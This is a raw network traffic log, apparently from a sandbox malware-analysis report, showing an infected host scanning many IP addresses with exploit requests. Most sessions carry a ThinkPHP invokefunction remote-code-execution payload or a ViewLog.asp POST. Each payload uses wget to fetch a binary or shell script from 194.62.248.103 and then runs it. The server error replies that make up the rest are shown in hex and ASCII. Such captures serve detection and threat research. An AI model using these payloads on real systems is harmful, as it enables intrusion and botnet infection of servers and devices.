                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.233868895.89.95.16880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.579513073 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.905000925 CEST299INHTTP/1.1 400 Bad Request
                                                        Server: freeathome
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.233416695.100.131.17880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.637945890 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.965392113 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 64 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 30 26 23 34 36 3b 37 38 33 33 38 64 31 36 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 64 64 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 30 26 23 34 36 3b 37 38 33 33 38 64 31 36 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;dd307b5c&#46;1713105380&#46;78338d16<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;dd307b5c&#46;1713105380&#46;78338d16</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.235741295.98.93.18380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.905035019 CEST696INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 32 31 20 31 38 6f 63 74 32 30 31 34 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 33 30 20 41 75 67 20 32 30 31 39 20
                                                        Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.21 18oct2014Date: Fri, 30 Aug 2019 17:11:16 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.234630295.100.68.25380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:21.263578892 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:21.562527895 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:21 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:21 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 31 26 23 34 36 3b 32 33 35 61 63 36 37 32 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 31 37 61 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 31 26 23 34 36 3b 32 33 35 61 63 36 37 32 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c17a7b5c&#46;1713105381&#46;235ac672<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;c17a7b5c&#46;1713105381&#46;235ac672</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.235408695.217.90.22180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:21.288125038 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:21.611691952 CEST495INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:21 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.234655295.0.117.9380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:21.595799923 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:29.950567007 CEST51INHTTP/1.1 504 Gateway Timeout
                                                        Connection: close
                                                        Apr 14, 2024 16:36:30.154566050 CEST51INHTTP/1.1 504 Gateway Timeout
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.235936695.196.101.18880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:21.598551035 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:21.945878983 CEST62INHTTP/1.0 400 Bad Request
                                                        Connection: Keep-Alive
                                                        Apr 14, 2024 16:36:21.945995092 CEST112INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68
                                                        Data Ascii: Keep-Alive: timeout=20X-Frame-Options: SAMEORIGINContent-Type: text/html<h1>Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.235605495.100.3.9380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:21.648303986 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.026309967 CEST577INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 355
                                                        Expires: Sun, 14 Apr 2024 14:36:21 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:21 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 64 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 31 26 23 34 36 3b 38 38 38 62 31 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 37 64 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 31 26 23 34 36 3b 38 38 38 62 31 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;7d722c31&#46;1713105381&#46;888b1<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;7d722c31&#46;1713105381&#46;888b1</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.235435462.29.6.1608080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.184165955 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.236031094.123.247.878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.186717987 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.234930295.183.84.438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.189099073 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.530205965 CEST469INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/html; charset=utf-8
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        Strict-Transport-Security: max-age=3600
                                                        Content-Length: 130
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.235133431.200.62.388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.194818020 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.234967295.101.242.16080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.238857031 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.530966043 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 31 32 35 39 33 39 36 33 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 31 32 35 39 33 39 36 33 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6e3f655f&#46;1713105382&#46;12593963<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;6e3f655f&#46;1713105382&#46;12593963</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.234219431.170.185.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.242470980 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.233633295.100.229.15380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.339591026 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.647193909 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 62 37 65 31 39 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 64 38 63 33 30 31 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 62 37 65 31 39 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 64 38 63 33 30 31 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4b7e19b8&#46;1713105382&#46;d8c3019<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;4b7e19b8&#46;1713105382&#46;d8c3019</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.236038695.100.188.4380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.344997883 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.659187078 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:22 GMT
